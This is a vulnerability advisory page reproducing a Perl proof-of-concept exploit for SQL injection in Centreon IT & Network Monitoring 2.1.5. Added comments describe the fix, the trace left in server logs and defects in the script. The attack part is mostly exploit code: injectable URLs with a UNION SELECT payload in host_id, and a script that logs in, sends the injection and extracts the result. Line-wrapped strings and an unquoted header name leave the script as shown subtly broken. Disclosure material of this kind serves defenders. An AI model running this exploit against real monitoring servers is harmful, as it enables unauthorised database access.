securityvulnsSecurityvulnsSECURITYVULNS:DOC:23527
HistoryApr 05, 2010 - 12:00 a.m.

Vulnerability Centreon IT & Network Monitoring v2.1.5

2010-04-0500:00:00

#!/usr/bin/perl

//--------[PoC]---------//

Title : Centreon IT & Network Monitoring v2.1.5 - Injection SQL

Version : 2.1.5

Author : Jonathan Salwan ([email protected])

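[Vuln sql injection]

The injection point is the host_id query parameter of main.php (page p=201). The script below logs in to index.php before it sends the request. Handling host_id as an integer or passing it as a bound query parameter is the standard fix for this class of bug.

http://localhost/centreon/main.php?p=201&host_id=-1%20[SQL Injection]&o=p&min=1

http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1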

//-------[Credit]-------//

http://www.sysdream.com/article.php?story_id=328&section_id=78

http://www.shell-storm.org

use LWP::UserAgent;

# Proof-of-concept flow: fetch the login page, submit credentials, then issue
# one GET to main.php with a UNION SELECT placed in the host_id parameter and
# print the lines of the response that contain a "Host" table cell.
# Detection note: the request is visible in web-server access logs as
# main.php?p=201 with a host_id value that is not a plain integer.

# Login endpoint and the account used for the session (placeholders as published).
my $url = 'http://localhost/centreon/index.php';
my $login = 'login';
my $paswd = 'pwd';
# Request URL carrying the injected host_id value. The literal spans two lines
# in this listing, so the string contains a newline between UNION and SELECT
# -- presumably a line-wrap artifact of the page rather than intent.
my $sql = 'http://localhost/centreon/main.php?p=201&host_id=-1 UNION
SELECT 1,@@version,3,4,5&o=p&min=1';

# First request: load the login page and keep whatever Set-Cookie header the
# server returns so it can be replayed on the following requests.
my $ua = LWP::UserAgent->new;
my $response = $ua->get($url);
my $cook = $response->header('Set-Cookie');

# Second request: post the login form (useralias / password / submit) with
# the cookie from the first response. The result in $req2 is never inspected,
# so a failed login goes unnoticed here.
my $req2 = $ua->post($url,
{useralias => $login, password => $paswd, submit =>
'login'},
Cookie => $cook,
# NOTE(review): Content-Type is unquoted; `=>` only auto-quotes the word
# directly to its left, so this is not parsed as the string 'Content-Type'.
Content-Type => 'application/x-www-form-urlencoded'
);

# Third request: send the injected URL with the same cookie and keep the body.
# NOTE(review): this re-declares $response with `my` in the same scope,
# masking the earlier variable.
my $response = $ua->get($sql, Cookie => $cook);
my $content = $response->content();

    # Write the response body to a scratch file in the current directory.
    # Two-argument open on a bareword handle; the result of open is not checked.
    open(FILE, '>sql-centreon.txt');
    print FILE $content;
    close(FILE);

    print "\n[Answer SQL Injection]\n\n";

    # Filter the saved page through a shell pipeline (cat | grep) for lines
    # containing >Host</td>. $selection receives system()'s status value and
    # is not used afterwards. The command string is wrapped across lines in
    # this listing, so it contains embedded newlines.
    my $selection = system('cat sql-centreon.txt | grep

">Host</td>"');
# Remove the scratch file once the output has been printed.
unlink('sql-centreon.txt');

print "\n";